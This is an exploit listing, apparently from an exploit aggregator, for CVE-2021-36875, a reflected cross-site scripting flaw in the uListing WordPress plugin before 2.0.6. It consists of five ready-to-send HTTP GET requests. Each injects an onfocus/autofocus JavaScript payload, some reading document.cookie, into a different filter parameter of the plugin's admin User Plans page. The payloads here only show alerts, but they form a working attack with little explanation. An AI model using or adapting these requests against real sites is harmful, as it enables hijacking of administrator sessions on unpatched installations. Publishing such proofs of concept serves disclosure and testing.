Exploit for uListing < 2.0.6 - Reflected Cross-Site Scripting CVE-2021-36875

Name: Exploit for uListing < 2.0.6 - Reflected Cross-Site Scripting CVE-2021-36875
Rating: 5 (299 reviews)
2021-07-27 | CVSS 3.5
## https://sploitus.com/exploit?id=WPEX-ID:5C902FAC-F9FE-4763-8894-F52ED0D5D4A3
PoC #1 | Authenticated Reflected XSS | User Plans > &filter[id]:

GET /wp-admin/edit.php?post_type=stm_pricing_plans&page=stm_user_plans&_wp_http_referer=%2Fwp-admin%2Fedit.php%3Fpost_type%3Dstm_pricing_plans%26page%3Dstm_user_plans&filter%5Bid%5D=%22autofocus%3Dautofocus+onfocus%3Dalert%28document.cookie%29%3B+%2F%2F&filter%5Buser%5D=&filter%5Bplan%5D=all&filter%5Btype%5D=all&filter%5Bstatus%5D=all&filter%5Bpayment_type%5D=all&filter%5Bexpired_date%5D=&filter%5Bcreated_date%5D=&filter%5Bupdated_date%5D=&paged=1 HTTP/2
Host: example.com


PoC #2 | Authenticated Reflected XSS | User Plans > &filter[user]:

GET /wp-admin/edit.php?post_type=stm_pricing_plans&page=stm_user_plans&_wp_http_referer=%2Fwp-admin%2Fedit.php%3Fpost_type%3Dstm_pricing_plans%26page%3Dstm_user_plans&filter%5Bid%5D=&filter%5Buser%5D=%22autofocus%3Dautofocus+onfocus%3Dalert%281553%29%3B+%2F%2F&filter%5Bplan%5D=all&filter%5Btype%5D=all&filter%5Bstatus%5D=all&filter%5Bpayment_type%5D=all&filter%5Bexpired_date%5D=&filter%5Bcreated_date%5D=&filter%5Bupdated_date%5D=&paged=1 HTTP/2
Host: example.com


PoC #3 | Authenticated Reflected XSS | User Plans > &filter[expired_date]:

GET /wp-admin/edit.php?post_type=stm_pricing_plans&page=stm_user_plans&_wpnonce=1337&_wp_http_referer=%2Fwp-admin%2Fedit.php%3Fpost_type%3Dstm_pricing_plans%26page%3Dstm_user_plans&filter%5Bid%5D&filter%5Buser%5D&filter%5Bplan%5D=all&filter%5Btype%5D=all&filter%5Bstatus%5D=all&filter%5Bpayment_type%5D=all&filter%5Bexpired_date%5D=2021-06-15%22autofocus%3Dautofocus+onfocus%3Dalert%281553%29%3B+%2F%2F&filter%5Bcreated_date%5D&filter%5Bupdated_date%5D&paged=1 HTTP/2
Host: example.com


PoC #4 | Authenticated Reflected XSS | User Plans > &filter[created_date]:

GET /wp-admin/edit.php?post_type=stm_pricing_plans&page=stm_user_plans&_wpnonce=1337&_wp_http_referer=%2Fwp-admin%2Fedit.php%3Fpost_type%3Dstm_pricing_plans%26page%3Dstm_user_plans&filter[id]&filter[user]&filter[plan]=all&filter[type]=all&filter[status]=all&filter[payment_type]=all&filter[expired_date]&filter[created_date]=2021-06-15%22autofocus=autofocus%20onfocus=alert(document.cookie);%20//&filter[updated_date]&paged=1 HTTP/2
Host: example.com


PoC #5 | Authenticated Reflected XSS | User Plans > &filter[updated_date]:

GET /wp-admin/edit.php?post_type=stm_pricing_plans&page=stm_user_plans&_wpnonce=1337&_wp_http_referer=%2Fwp-admin%2Fedit.php%3Fpost_type%3Dstm_pricing_plans%26page%3Dstm_user_plans&filter[id]&filter[user]&filter[plan]=all&filter[type]=all&filter[status]=all&filter[payment_type]=all&filter[expired_date]&filter[created_date]&filter[updated_date]=2021-06-15%22autofocus=autofocus%20onfocus=alert(1553);%20//&paged=1 HTTP/2
Host: example.com